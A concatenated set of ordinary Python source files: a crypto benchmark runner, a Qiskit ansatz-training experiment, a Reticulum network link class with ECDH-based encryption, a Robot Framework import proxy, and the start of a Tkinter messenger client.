header = '\n{0:<5} {1:<4} {2:<6} {3:<7} {4:<40}'\
.format('NO', 'CORE', 'ARCH', 'DIR', 'ALG')
result = [] # list to store parsed results
# init global vars
init_global_vars()
supported_archs, best_arch, cipher_algos, hash_algos, aead_algos = get_info()
# parse command line args
archs, cores, directions, offset, alg_types, sizes, cold_cache, arch_best, \
shani_off, gcm_job_api, unhalted_cycles, quick_test, smoke_test, \
imix, aad_size, job_iter = parse_args()
# validate requested archs are supported
if arch_best is True:
archs = best_arch
elif archs is None:
archs = supported_archs
else:
for arch in archs:
if arch not in supported_archs:
print('Error: {} arch not supported!'.format(arch), file=sys.stderr)
sys.exit(1)
# print args
if QUIET is False:
print('Testing:', file=sys.stderr)
print(' Architectures: {}'.format(archs), file=sys.stderr)
print(' Algorithms: {}'.format(alg_types), file=sys.stderr)
print(' Directions: {}'.format(directions), file=sys.stderr)
if offset is not None:
print(' Offset: {}'.format(offset), file=sys.stderr)
if aad_size is not None:
print(' AAD size: {}'.format(aad_size), file=sys.stderr)
if sizes is not None:
print(' Sizes: {}'.format(sizes), file=sys.stderr)
if imix is not None:
print(' IMIX: {}'.format(imix), file=sys.stderr)
if cores is not None:
print(' Cores: {}'.format(cores), file=sys.stderr)
print(' Cache: {}'.format("cold" if cold_cache else "warm"), file=sys.stderr)
print(' SHANI: {}'.format("off" if shani_off else "on"), file=sys.stderr)
print(' GCM API: {}'.format("job" if gcm_job_api else "direct"), file=sys.stderr)
print(' Measuring using {}'.format("unhalted cycles" if unhalted_cycles \
else "rdtsc"), file=sys.stderr)
if quick_test is True or smoke_test is True:
print(' Test type: {}'.format("smoke" if smoke_test else "quick"), file=sys.stderr)
if job_iter is not None:
print(' Job iterations: {}'.format(job_iter), file=sys.stderr)
print(header, file=sys.stderr)
# fill todo queue with variants to test
for arch in archs:
if 'cipher-only' in alg_types:
for direction in directions:
for cipher_alg in cipher_algos:
TODO_Q.put(Variant(idx=TOTAL_VARIANTS, arch=arch, direction=direction,
offset=offset, sizes=sizes, cipher_alg=cipher_alg,
cold_cache=cold_cache, shani_off=shani_off,
gcm_job_api=gcm_job_api, unhalted_cycles=unhalted_cycles,
quick_test=quick_test, smoke_test=smoke_test, imix=imix,
aad_size=aad_size, job_iter=job_iter))
TOTAL_VARIANTS += 1
if 'hash-only' in alg_types:
# skip direction for hash only algs
for hash_alg in hash_algos:
TODO_Q.put(Variant(idx=TOTAL_VARIANTS, arch=arch, direction=None,
offset=offset, sizes=sizes, hash_alg=hash_alg,
cold_cache=cold_cache, shani_off=shani_off,
gcm_job_api=gcm_job_api, unhalted_cycles=unhalted_cycles,
quick_test=quick_test, smoke_test=smoke_test, imix=imix,
aad_size=aad_size, job_iter=job_iter))
TOTAL_VARIANTS += 1
if 'aead-only' in alg_types:
for direction in directions:
for aead_alg in aead_algos:
TODO_Q.put(Variant(idx=TOTAL_VARIANTS, arch=arch, direction=direction,
offset=offset, sizes=sizes, aead_alg=aead_alg,
cold_cache=cold_cache, shani_off=shani_off,
gcm_job_api=gcm_job_api, unhalted_cycles=unhalted_cycles,
quick_test=quick_test, smoke_test=smoke_test, imix=imix,
aad_size=aad_size, job_iter=job_iter))
TOTAL_VARIANTS += 1
if 'cipher-hash-all' in alg_types:
for direction in directions:
# all cipher + hash combinations
for cipher_alg in cipher_algos:
for hash_alg in hash_algos:
TODO_Q.put(Variant(idx=TOTAL_VARIANTS, arch=arch, direction=direction,
offset=offset, sizes=sizes, cipher_alg=cipher_alg,
hash_alg=hash_alg, cold_cache=cold_cache,
shani_off=shani_off, gcm_job_api=gcm_job_api,
unhalted_cycles=unhalted_cycles, quick_test=quick_test,
smoke_test=smoke_test, imix=imix, aad_size=aad_size,
job_iter=job_iter))
TOTAL_VARIANTS += 1
# take starting timestamp
start_ts = time.time()
# If cores selected start a new thread on each core
# otherwise start single thread without specifying a core
#
# Each thread takes a variant from the todo queue
# and places it in the done queue when complete
if cores is None:
threading.Thread(target=run_test).start()
else:
for core in cores:
threading.Thread(target=run_test, args=(core,)).start()
# wait for all threads to complete
TODO_Q.join()
# take end timestamp
end_ts = time.time()
# exit if error encountered
if EXIT_ERROR is True:
print('Error encountered while running tests!', file=sys.stderr)
sys.exit(1)
# output time taken to complete
runtime = end_ts - start_ts
if QUIET is False:
print("Time to complete: {:.3f} seconds" \
.format(runtime), file=sys.stderr)
# transfer completed runs from the
# done queue to the results list
while DONE_Q.empty() is False:
variant = DONE_Q.get()
result.append(variant)
# sort by idx
result.sort(key=lambda x: x.get_idx())
# parse results and print to stdout
output = parse_results(result)
for line in output:
print(line)
if __name__ == "__main__":
main()
|
compare_num_layer_haar_multiprocessing_sgd.py
|
import qiskit
import numpy as np
import sys
import multiprocessing
sys.path.insert(1, '../')
import qtm.base, qtm.constant, qtm.nqubit, qtm.fubini_study, qtm.encoding
def run_haar(num_layers, num_qubits):
psi = 2*np.random.rand(2**num_qubits)-1
# Haar
thetas = np.ones(num_qubits*num_layers*5)
psi = psi / np.linalg.norm(psi)
encoder = qtm.encoding.Encoding(psi, 'amplitude_encoding')
loss_values_haar = []
thetass_haar = []
for i in range(0, 400):
if i % 20 == 0:
print('Haar (' + str(num_layers) + ' layer): ', i)
qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
# G = qtm.fubini_study.calculate_linear_state(qc.copy(), thetas, num_layers)
qc = encoder.qcircuit
grad_loss = qtm.base.grad_loss(
qc,
qtm.nqubit.create_haarchecker_linear,
thetas, num_layers = num_layers, encoder = encoder)
# grad1 = np.real(np.linalg.inv(G) @ grad_loss)
thetas -= qtm.constant.learning_rate*grad_loss
qc_copy = qtm.nqubit.create_haarchecker_linear(qc.copy(), thetas, num_layers, encoder)
loss = qtm.base.loss_basis(qtm.base.measure(qc_copy, list(range(qc_copy.num_qubits))))
loss_values_haar.append(loss)
thetass_haar.append(thetas.copy())
traces_haar, fidelities_haar = [], []
for thetas in thetass_haar:
# Get |psi> = U_gen|000...>
qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
qc = qtm.nqubit.create_linear_state(qc, thetas, num_layers = num_layers)
psi , rho_psi = qtm.base.extract_state(qc)
# Get |psi~> = U_target|000...>
qc1 = encoder.qcircuit
psi_hat , rho_psi_hat = qtm.base.extract_state(qc1)
# Calculate the metrics
trace, fidelity = qtm.base.get_metrics(psi, psi_hat)
traces_haar.append(trace)
fidelities_haar.append(fidelity)
print('Writting ... ' + str(num_layers))
np.savetxt("../../experiments/linear_ansatz_15layer_sgd/" + str(num_layers) + "/loss_values_haar.csv", loss_values_haar, delimiter=",")
np.savetxt("../../experiments/linear_ansatz_15layer_sgd/" + str(num_layers) + "/thetass_haar.csv", thetass_haar, delimiter=",")
np.savetxt("../../experiments/linear_ansatz_15layer_sgd/" + str(num_layers) + "/traces_haar.csv", traces_haar, delimiter=",")
np.savetxt("../../experiments/linear_ansatz_15layer_sgd/" + str(num_layers) + "/fidelities_haar.csv", fidelities_haar, delimiter=",")
if __name__ == "__main__":
# creating thread
num_qubits = 5
num_layers = [1, 2, 3, 4, 5]
t_haar = []
for i in num_layers:
t_haar.append(multiprocessing.Process(target = run_haar, args=(i, num_qubits)))
for i in range(0, len(num_layers)):
t_haar[i].start()
for i in range(0, len(num_layers)):
t_haar[i].join()
print("Done!")
|
Link.py
|
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.kdf.hkdf import HKDF
from cryptography.fernet import Fernet
from time import sleep
import vendor.umsgpack as umsgpack
import threading
import base64
import time
import RNS
import traceback
class LinkCallbacks:
def __init__(self):
self.link_established = None
self.link_closed = None
self.packet = None
self.resource_started = None
self.resource_concluded = None
class Link:
CURVE = ec.SECP256R1()
ECPUBSIZE = 91
BLOCKSIZE = 16
# TODO: This should not be hardcoded,
# but calculated from something like
# first-hop RTT latency and distance
DEFAULT_TIMEOUT = 15.0
TIMEOUT_FACTOR = 3
KEEPALIVE = 120
PENDING = 0x00
HANDSHAKE = 0x01
ACTIVE = 0x02
STALE = 0x03
CLOSED = 0x04
TIMEOUT = 0x01
INITIATOR_CLOSED = 0x02
DESTINATION_CLOSED = 0x03
ACCEPT_NONE = 0x00
ACCEPT_APP = 0x01
ACCEPT_ALL = 0x02
resource_strategies = [ACCEPT_NONE, ACCEPT_APP, ACCEPT_ALL]
@staticmethod
def validateRequest(owner, data, packet):
if len(data) == (Link.ECPUBSIZE):
try:
link = Link(owner = owner, peer_pub_bytes = data[:Link.ECPUBSIZE])
link.setLinkID(packet)
link.destination = packet.destination
RNS.log("Validating link request "+RNS.prettyhexrep(link.link_id), RNS.LOG_VERBOSE)
link.handshake()
link.attached_interface = packet.receiving_interface
link.prove()
link.request_time = time.time()
RNS.Transport.registerLink(link)
link.last_inbound = time.time()
link.start_watchdog()
# TODO: Why was link_established callback here? Seems weird
# to call this before RTT packet has been received
#if self.owner.callbacks.link_established != None:
# self.owner.callbacks.link_established(link)
RNS.log("Incoming link request "+str(link)+" accepted, waiting for RTT packet", RNS.LOG_VERBOSE)
return link
except Exception as e:
RNS.log("Validating link request failed", RNS.LOG_VERBOSE)
traceback.print_exc()
return None
else:
RNS.log("Invalid link request payload size, dropping request", RNS.LOG_VERBOSE)
return None
def __init__(self, destination=None, owner=None, peer_pub_bytes = None):
if destination != None and destination.type != RNS.Destination.SINGLE:
raise TypeError("Links can only be established to the \"single\" destination type")
self.rtt = None
self.callbacks = LinkCallbacks()
self.resource_strategy = Link.ACCEPT_NONE
self.outgoing_resources = []
self.incoming_resources = []
self.last_inbound = 0
self.last_outbound = 0
self.tx = 0
self.rx = 0
self.txbytes = 0
self.rxbytes = 0
self.default_timeout = Link.DEFAULT_TIMEOUT
self.proof_timeout = self.default_timeout
self.timeout_factor = Link.TIMEOUT_FACTOR
self.keepalive = Link.KEEPALIVE
self.watchdog_lock = False
self.status = Link.PENDING
self.type = RNS.Destination.LINK
self.owner = owner
self.destination = destination
self.attached_interface = None
self.__encryption_disabled = False
if self.destination == None:
self.initiator = False
else:
self.initiator = True
self.prv = ec.generate_private_key(Link.CURVE, default_backend())
self.pub = self.prv.public_key()
self.pub_bytes = self.pub.public_bytes(
encoding=serialization.Encoding.DER,
format=serialization.PublicFormat.SubjectPublicKeyInfo
)
if peer_pub_bytes == None:
self.peer_pub = None
self.peer_pub_bytes = None
else:
self.loadPeer(peer_pub_bytes)
if (self.initiator):
self.request_data = self.pub_bytes
self.packet = RNS.Packet(destination, self.request_data, packet_type=RNS.Packet.LINKREQUEST)
self.packet.pack()
self.setLinkID(self.packet)
RNS.Transport.registerLink(self)
self.request_time = time.time()
self.start_watchdog()
self.packet.send()
RNS.log("Link request "+RNS.prettyhexrep(self.link_id)+" sent to "+str(self.destination), RNS.LOG_VERBOSE)
def loadPeer(self, peer_pub_bytes):
self.peer_pub_bytes = peer_pub_bytes
self.peer_pub = serialization.load_der_public_key(peer_pub_bytes, backend=default_backend())
if not hasattr(self.peer_pub, "curve"):
self.peer_pub.curve = Link.CURVE
def setLinkID(self, packet):
self.link_id = RNS.Identity.truncatedHash(packet.raw)
self.hash = self.link_id
def handshake(self):
self.status = Link.HANDSHAKE
self.shared_key = self.prv.exchange(ec.ECDH(), self.peer_pub)
self.derived_key = HKDF(
algorithm=hashes.SHA256(),
length=32,
salt=self.getSalt(),
info=self.getContext(),
backend=default_backend()
).derive(self.shared_key)
def prove(self):
signed_data = self.link_id+self.pub_bytes
signature = self.owner.identity.sign(signed_data)
proof_data = self.pub_bytes+signature
proof = RNS.Packet(self, proof_data, packet_type=RNS.Packet.PROOF, context=RNS.Packet.LRPROOF)
proof.send()
def prove_packet(self, packet):
signature = self.sign(packet.packet_hash)
# TODO: Hardcoded as explicit proof for now
# if RNS.Reticulum.should_use_implicit_proof():
# proof_data = signature
# else:
# proof_data = packet.packet_hash + signature
proof_data = packet.packet_hash + signature
proof = RNS.Packet(self, proof_data, RNS.Packet.PROOF)
proof.send()
def validateProof(self, packet):
if self.initiator:
peer_pub_bytes = packet.data[:Link.ECPUBSIZE]
signed_data = self.link_id+peer_pub_bytes
signature = packet.data[Link.ECPUBSIZE:RNS.Identity.KEYSIZE/8+Link.ECPUBSIZE]
if self.destination.identity.validate(signature, signed_data):
self.loadPeer(peer_pub_bytes)
self.handshake()
self.rtt = time.time() - self.request_time
self.attached_interface = packet.receiving_interface
RNS.Transport.activateLink(self)
RNS.log("Link "+str(self)+" established with "+str(self.destination)+", RTT is "+str(self.rtt), RNS.LOG_VERBOSE)
rtt_data = umsgpack.packb(self.rtt)
rtt_packet = RNS.Packet(self, rtt_data, context=RNS.Packet.LRRTT)
RNS.log("Sending RTT packet", RNS.LOG_EXTREME);
rtt_packet.send()
self.status = Link.ACTIVE
if self.callbacks.link_established != None:
self.callbacks.link_established(self)
else:
RNS.log("Invalid link proof signature received by "+str(self), RNS.LOG_VERBOSE)
# TODO: should we really do this, or just wait
# for a valid one? Needs analysis.
self.teardown()
def rtt_packet(self, packet):
try:
# TODO: This is crude, we should use the delta
# to model a more representative per-bit round
# trip time, and use that to set a sensible RTT
# expectancy for the link. This will have to do
# for now though.
measured_rtt = time.time() - self.request_time
plaintext = self.decrypt(packet.data)
rtt = umsgpack.unpackb(plaintext)
self.rtt = max(measured_rtt, rtt)
self.status = Link.ACTIVE
# TODO: Link established callback moved here, ok?
if self.owner.callbacks.link_established != None:
self.owner.callbacks.link_established(self)
except Exception as e:
RNS.log("Error occurred while processing RTT packet, tearing down link", RNS.LOG_ERROR)
traceback.print_exc()
self.teardown()
def getSalt(self):
return self.link_id
def getContext(self):
return None
def teardown(self):
if self.status != Link.PENDING and self.status != Link.CLOSED:
teardown_packet = RNS.Packet(self, self.link_id, context=RNS.Packet.LINKCLOSE)
teardown_packet.send()
self.status = Link.CLOSED
if self.initiator:
self.teardown_reason = Link.INITIATOR_CLOSED
else:
self.teardown_reason = Link.DESTINATION_CLOSED
self.link_closed()
def teardown_packet(self, packet):
try:
plaintext = self.decrypt(packet.data)
if plaintext == self.link_id:
self.status = Link.CLOSED
if self.initiator:
self.teardown_reason = Link.DESTINATION_CLOSED
else:
self.teardown_reason = Link.INITIATOR_CLOSED
self.link_closed()
except Exception as e:
pass
def link_closed(self):
for resource in self.incoming_resources:
resource.cancel()
for resource in self.outgoing_resources:
resource.cancel()
self.prv = None
self.pub = None
self.pub_bytes = None
self.shared_key = None
self.derived_key = None
if self.callbacks.link_closed != None:
self.callbacks.link_closed(self)
def start_watchdog(self):
thread = threading.Thread(target=self.__watchdog_job)
thread.setDaemon(True)
thread.start()
def __watchdog_job(self):
while not self.status == Link.CLOSED:
while (self.watchdog_lock):
sleep(max(self.rtt, 0.025))
if not self.status == Link.CLOSED:
# Link was initiated, but no response
# from destination yet
if self.status == Link.PENDING:
next_check = self.request_time + self.proof_timeout
sleep_time = next_check - time.time()
if time.time() >= self.request_time + self.proof_timeout:
RNS.log("Link establishment timed out", RNS.LOG_VERBOSE)
self.status = Link.CLOSED
self.teardown_reason = Link.TIMEOUT
self.link_closed()
sleep_time = 0.001
elif self.status == Link.HANDSHAKE:
next_check = self.request_time + self.proof_timeout
sleep_time = next_check - time.time()
if time.time() >= self.request_time + self.proof_timeout:
RNS.log("Timeout waiting for RTT packet from link initiator", RNS.LOG_DEBUG)
self.status = Link.CLOSED
self.teardown_reason = Link.TIMEOUT
self.link_closed()
sleep_time = 0.001
elif self.status == Link.ACTIVE:
if time.time() >= self.last_inbound + self.keepalive:
sleep_time = self.rtt * self.timeout_factor
self.status = Link.STALE
if self.initiator:
self.send_keepalive()
else:
sleep_time = (self.last_inbound + self.keepalive) - time.time()
elif self.status == Link.STALE:
sleep_time = 0.001
self.status = Link.CLOSED
self.teardown_reason = Link.TIMEOUT
self.link_closed()
if sleep_time == 0:
RNS.log("Warning! Link watchdog sleep time of 0!", RNS.LOG_ERROR)
if sleep_time == None or sleep_time < 0:
RNS.log("Timing error! Closing Reticulum now.", RNS.LOG_CRITICAL)
RNS.panic()
sleep(sleep_time)
def send_keepalive(self):
keepalive_packet = RNS.Packet(self, chr(0xFF), context=RNS.Packet.KEEPALIVE)
keepalive_packet.send()
def receive(self, packet):
self.watchdog_lock = True
if not self.status == Link.CLOSED and not (self.initiator and packet.context == RNS.Packet.KEEPALIVE and packet.data == chr(0xFF)):
if packet.receiving_interface != self.attached_interface:
RNS.log("Link-associated packet received on unexpected interface! Someone might be trying to manipulate your communication!", RNS.LOG_ERROR)
else:
self.last_inbound = time.time()
self.rx += 1
self.rxbytes += len(packet.data)
if self.status == Link.STALE:
self.status = Link.ACTIVE
if packet.packet_type == RNS.Packet.DATA:
if packet.context == RNS.Packet.NONE:
plaintext = self.decrypt(packet.data)
if self.callbacks.packet != None:
self.callbacks.packet(plaintext, packet)
if self.destination.proof_strategy == RNS.Destination.PROVE_ALL:
packet.prove()
elif self.destination.proof_strategy == RNS.Destination.PROVE_APP:
if self.destination.callbacks.proof_requested:
self.destination.callbacks.proof_requested(packet)
elif packet.context == RNS.Packet.LRRTT:
if not self.initiator:
self.rtt_packet(packet)
elif packet.context == RNS.Packet.LINKCLOSE:
self.teardown_packet(packet)
elif packet.context == RNS.Packet.RESOURCE_ADV:
packet.plaintext = self.decrypt(packet.data)
if self.resource_strategy == Link.ACCEPT_NONE:
pass
elif self.resource_strategy == Link.ACCEPT_APP:
if self.callbacks.resource != None:
self.callbacks.resource(packet)
elif self.resource_strategy == Link.ACCEPT_ALL:
RNS.Resource.accept(packet, self.callbacks.resource_concluded)
elif packet.context == RNS.Packet.RESOURCE_REQ:
plaintext = self.decrypt(packet.data)
if ord(plaintext[:1]) == RNS.Resource.HASHMAP_IS_EXHAUSTED:
resource_hash = plaintext[1+RNS.Resource.MAPHASH_LEN:RNS.Identity.HASHLENGTH/8+1+RNS.Resource.MAPHASH_LEN]
else:
resource_hash = plaintext[1:RNS.Identity.HASHLENGTH/8+1]
for resource in self.outgoing_resources:
if resource.hash == resource_hash:
resource.request(plaintext)
elif packet.context == RNS.Packet.RESOURCE_HMU:
plaintext = self.decrypt(packet.data)
resource_hash = plaintext[:RNS.Identity.HASHLENGTH/8]
for resource in self.incoming_resources:
if resource_hash == resource.hash:
resource.hashmap_update_packet(plaintext)
elif packet.context == RNS.Packet.RESOURCE_ICL:
plaintext = self.decrypt(packet.data)
resource_hash = plaintext[:RNS.Identity.HASHLENGTH/8]
for resource in self.incoming_resources:
if resource_hash == resource.hash:
resource.cancel()
elif packet.context == RNS.Packet.KEEPALIVE:
if not self.initiator and packet.data == chr(0xFF):
keepalive_packet = RNS.Packet(self, chr(0xFE), context=RNS.Packet.KEEPALIVE)
keepalive_packet.send()
# TODO: find the most efficient way to allow multiple
# transfers at the same time, sending resource hash on
# each packet is a huge overhead. Probably some kind
# of hash -> sequence map
elif packet.context == RNS.Packet.RESOURCE:
for resource in self.incoming_resources:
resource.receive_part(packet)
elif packet.packet_type == RNS.Packet.PROOF:
if packet.context == RNS.Packet.RESOURCE_PRF:
resource_hash = packet.data[0:RNS.Identity.HASHLENGTH/8]
for resource in self.outgoing_resources:
if resource_hash == resource.hash:
resource.validateProof(packet.data)
self.watchdog_lock = False
def encrypt(self, plaintext):
if self.__encryption_disabled:
return plaintext
try:
fernet = Fernet(base64.urlsafe_b64encode(self.derived_key))
ciphertext = base64.urlsafe_b64decode(fernet.encrypt(plaintext))
return ciphertext
except Exception as e:
RNS.log("Encryption on link "+str(self)+" failed. The contained exception was: "+str(e), RNS.LOG_ERROR)
def decrypt(self, ciphertext):
if self.__encryption_disabled:
return ciphertext
try:
fernet = Fernet(base64.urlsafe_b64encode(self.derived_key))
plaintext = fernet.decrypt(base64.urlsafe_b64encode(ciphertext))
return plaintext
except Exception as e:
RNS.log("Decryption failed on link "+str(self)+". The contained exception was: "+str(e), RNS.LOG_ERROR)
traceback.print_exc()
def sign(self, message):
return self.prv.sign(message, ec.ECDSA(hashes.SHA256()))
def validate(self, signature, message):
try:
self.peer_pub.verify(signature, message, ec.ECDSA(hashes.SHA256()))
return True
except Exception as e:
return False
def link_established_callback(self, callback):
self.callbacks.link_established = callback
def link_closed_callback(self, callback):
self.callbacks.link_closed = callback
def packet_callback(self, callback):
self.callbacks.packet = callback
# Called when an incoming resource transfer is started
def resource_started_callback(self, callback):
self.callbacks.resource_started = callback
# Called when a resource transfer is concluded
def resource_concluded_callback(self, callback):
self.callbacks.resource_concluded = callback
def resource_concluded(self, resource):
if resource in self.incoming_resources:
self.incoming_resources.remove(resource)
if resource in self.outgoing_resources:
self.outgoing_resources.remove(resource)
def set_resource_strategy(self, resource_strategy):
if not resource_strategy in Link.resource_strategies:
raise TypeError("Unsupported resource strategy")
else:
self.resource_strategy = resource_strategy
def register_outgoing_resource(self, resource):
self.outgoing_resources.append(resource)
def register_incoming_resource(self, resource):
self.incoming_resources.append(resource)
def cancel_outgoing_resource(self, resource):
if resource in self.outgoing_resources:
self.outgoing_resources.remove(resource)
else:
RNS.log("Attempt to cancel a non-existing incoming resource", RNS.LOG_ERROR)
def cancel_incoming_resource(self, resource):
if resource in self.incoming_resources:
self.incoming_resources.remove(resource)
else:
RNS.log("Attempt to cancel a non-existing incoming resource", RNS.LOG_ERROR)
def ready_for_new_resource(self):
if len(self.outgoing_resources) > 0:
return False
else:
return True
def disableEncryption(self):
if (RNS.Reticulum.should_allow_unencrypted()):
RNS.log("The link "+str(self)+" was downgraded to an encryptionless link", RNS.LOG_NOTICE)
self.__encryption_disabled = True
else:
RNS.log("Attempt to disable encryption on link, but encryptionless links are not allowed by config.", RNS.LOG_CRITICAL)
RNS.log("Shutting down Reticulum now!", RNS.LOG_CRITICAL)
RNS.panic()
def encryption_disabled(self):
return self.__encryption_disabled
def __str__(self):
return RNS.prettyhexrep(self.link_id)
|
SuiteVisitorImportProxy.py
|
#
# Copyright 2017 Nokia Solutions and Networks
# Licensed under the Apache License, Version 2.0,
# see license.txt file for details.
#
import threading
import sys
import json
import types
import inspect
import re
from robot.running.builder import TestSuiteBuilder
from robot.api import SuiteVisitor
from robot.running import TestLibrary
from robot.running.testlibraries import _BaseTestLibrary
from robot.running.handlers import _DynamicHandler, _JavaHandler
from robot.output import LOGGER, Message
class RedTestSuiteBuilder(TestSuiteBuilder):
""" switch off empty suite removing """
def _parse_and_build(self, path):
suite = self._build_suite(self._parse(path))
return suite
class SuiteVisitorImportProxy(SuiteVisitor):
""" suite names should be passed as arguments """
LIB_IMPORT_TIMEOUT = 60
def __init__(self, *args):
self.f_suites = [name for name in args if name]
self.__wrap_importer()
def __wrap_importer(self):
import robot
import robot.running.namespace
import robot.running.importer
current = robot.running.namespace.IMPORTER
to_wrap = current if isinstance(current, robot.running.importer.Importer) else current.importer
robot.running.namespace.IMPORTER = RedImporter(to_wrap, self.LIB_IMPORT_TIMEOUT)
def visit_suite(self, suite):
if suite.parent:
suite.parent.tests.clear()
suite.parent.keywords.clear()
else:
# when first suite is visited all suites are counted and message is send to server
msg = json.dumps({'suite_count': self.__count_suites(suite)})
LOGGER.message(Message(message=msg, level='NONE'))
if len(suite.tests) == 0 or suite.test_count == 0:
current_suite = RedTestSuiteBuilder().build(suite.source)
if len(self.f_suites) == 0:
suite.suites = current_suite.suites
else:
suite.suites = self.__filter_by_name(current_suite.suites)
suite.tests.clear()
suite.keywords.clear()
suite.suites.visit(self)
def visit_test(self, test):
# test visiting skipped
pass
def visit_keyword(self, kw):
# keyword visiting skipped
pass
def visit_message(self, msg):
# message visiting skipped
pass
def __count_suites(self, suite):
if suite.suites:
return 1 + sum(self.__count_suites(s) for s in suite.suites)
else:
return 1
def __filter_by_name(self, suites):
matched_suites = []
for suite in suites:
for s_name in self.f_suites:
if suite not in matched_suites and self.__suite_name_matches(suite, s_name):
matched_suites.append(suite)
suite.suites = self.__filter_by_name(suite.suites)
return matched_suites
def __suite_name_matches(self, suite, s_name):
longpath = suite.longname.lower().replace('_', ' ')
normalized_s_name = s_name.lower().replace('_', ' ')
matches = lambda x: x == '' or x.startswith('.') or x.startswith('*') or x.startswith('?')
if len(longpath) >= len(normalized_s_name) and longpath.startswith(normalized_s_name):
return matches(longpath.replace(normalized_s_name, ''))
elif len(longpath) < len(normalized_s_name) and normalized_s_name.startswith(longpath):
return matches(normalized_s_name.replace(longpath, ''))
return False
class RedImporter(object):
def __init__(self, importer, lib_import_timeout):
self.importer = importer
self.lib_import_timeout = int(lib_import_timeout)
self.func = None
self.lock = threading.Lock()
self.cached_lib_items = list()
self.cached_kw_items = set()
def __getattr__(self, name):
self.lock.acquire()
try:
if hasattr(self.importer, name):
func = getattr(self.importer, name)
return lambda *args, **kwargs: self._wrap(func, args, kwargs)
raise AttributeError(name)
finally:
self.lock.release()
def _wrap(self, func, args, kwargs):
if isinstance(func, types.MethodType):
if func.__name__ == 'import_library':
return self._handle_lib_import(func, args, kwargs)
else:
return func(*args, **kwargs)
else:
return func(self.importer, *args, **kwargs)
def _handle_lib_import(self, func, args, kwargs):
libs = []
errors = []
lib_cached = self._get_lib_from_cache(args[0], args[1])
if lib_cached:
libs.append(lib_cached.lib)
errors = lib_cached.errors
else:
try:
def to_call():
try:
libs.append(func(*args, **kwargs))
except:
errors.append(sys.exc_info())
t = threading.Thread(target=to_call)
t.setDaemon(True)
t.start()
t.join(timeout=self.lib_import_timeout)
except:
errors.append(sys.exc_info())
if len(libs) > 0:
library = libs[0]
else:
try:
library = TestLibrary(args[0], args[1], args[2], create_handlers=False)
except:
try:
library = _BaseTestLibrary(libcode=None, name=args[0], args=args[1], source=None, variables=args[2])
except:
try:
library = _BaseTestLibrary(libcode=None, name=args[0], args=[], source=None, variables=args[3])
except:
errors.append(sys.exc_info())
if lib_cached is None:
self.cached_lib_items.append(LibItem(args[0], args[1], library, errors))
for e in errors:
msg = '{LIB_ERROR: ' + args[0] + ', value: VALUE_START(' + str(e) + ')VALUE_END, lib_file_import:' + str(
library.source) + '}'
LOGGER.message(Message(message=msg, level='FAIL'))
self._handle_keywords(library)
return library
def _get_lib_from_cache(self, name, args):
for cached_lib in self.cached_lib_items:
if cached_lib.name == name:
if len(cached_lib.args) == len(args):
for cached_arg, arg in zip(cached_lib.args, args):
if cached_arg != arg:
return None
return cached_lib
return None
def _handle_keywords(self, library):
if library and hasattr(library, 'handlers'):
for keyword in library.handlers:
if keyword not in self.cached_kw_items and not isinstance(keyword, _JavaHandler):
try:
keyword_source = PythonKeywordSource(keyword)
msg = json.dumps({'keyword': dict(keyword_source.__dict__)}, sort_keys=True)
LOGGER.message(Message(message=msg, level='NONE'))
except:
pass # TODO: add logging
finally:
self.cached_kw_items.add(keyword)
class LibItem(object):
def __init__(self, name, args, lib=None, errors=list()):
self.name = name
self.args = args
self.lib = lib
self.errors = errors
class PythonKeywordSource(object):
def __init__(self, keyword):
self.name = keyword.name
self.libraryName = keyword.library.name
source = self._find_source(keyword)
self.filePath = source[0]
self.line = source[1]
self.offset = source[2]
self.length = source[3]
def _find_source(self, keyword):
function = self._resolve_function(keyword)
path = inspect.getfile(function)
source = inspect.getsourcelines(function)
for lineIdx, line in enumerate(source[0]):
m = re.search('(?<=def)(\s*)([^ \t\n\r\f\v(]+)', line)
if m is not None:
line = source[1] + lineIdx - 1
offset = m.start(2)
length = len(m.group(2))
return path, line, offset, length
return path, 0, 0, 0
@staticmethod
def _resolve_function(keyword):
if isinstance(keyword, _DynamicHandler):
return keyword.library._libcode.__dict__[keyword._run_keyword_method_name]
elif keyword._method:
return keyword._method
else:
return keyword._get_handler(keyword.library.get_instance(), keyword._handler_name)
|
client.py
|
import sys
import os
import tkinter as tk
from threading import Thread
from VectorMessenger.MessengerCore.Helpers import Global as h
from VectorMessenger.MessengerCore.Helpers import Client as h_cl
from VectorMessenger.MessengerCore.CoreClient import MessengerClient
from VectorMessenger.MessengerCore.Encryption import VMCrypt
class VM_MainWindow:
def __init__(self, root: object):
def _on_close():
self.messenger.stop_message_polling()
root.destroy()
root.protocol('WM_DELETE_WINDOW', _on_close)
self.root = root
# Header Menu
self.HM_Root = tk.Menu(root)
root.configure(menu=self.HM_Root)
self.HM_Theme = tk.Menu(self.HM_Root, tearoff=0)
self.HM_Root.add_cascade(label='Theme', menu=self.HM_Theme)
self.HM_Theme.add_command(label='Light', command=lambda: self.set_color_scheme(0))
self.HM_Theme.add_command(label='Dark', command=lambda: self.set_color_scheme(1))
self.HM_Advanced = tk.Menu(self.HM_Root, tearoff=0)
self.HM_Root.add_cascade(label='Settings', command=self.show_window_settings)
self.HM_Root.add_cascade(label='Advanced', menu=self.HM_Advanced)
self.HM_Advanced.add_command(label='Debug Console', command=self.show_debug_console)
# Top
self.frame_top = tk.Frame(root)
self.chat_messages = tk.Text(self.frame_top, width=48, height=26, wrap=tk.WORD, state=tk.DISABLED, font='Arial 13')
self.chat_scroll = tk.Scrollbar(self.frame_top, command=self.chat_messages.yview)
self.chat_messages.config(yscrollcommand=self.chat_scroll.set)
self.frame_top.grid(column=0, row=0, sticky="NSEW")
self.chat_messages.grid(column=0, row=0, sticky="NSEW")
self.chat_scroll.grid(column=1, row=0, sticky="NS")
self.frame_top.columnconfigure(0, weight=1)
self.frame_top.rowconfigure(0, weight=1)
# Bottom
self.frame_bot = tk.Frame(root)
self.chat_message_input = tk.Entry(self.frame_bot, width=50)
self.chat_message_input.bind('<Return>', self.send_message)
self.chat_btn_send_message = tk.Button(self.frame_bot, text="\u27A2", font=20, relief=tk.FLAT, command=self.send_message)
self.frame_bot.grid(column=0, row=1, sticky="NSEW")
self.chat_message_input.grid(column=0, row=0, sticky="NSEW")
self.chat_btn_send_message.grid(column=1, row=0, sticky="SE")
self.frame_bot.columnconfigure(0, weight=1)
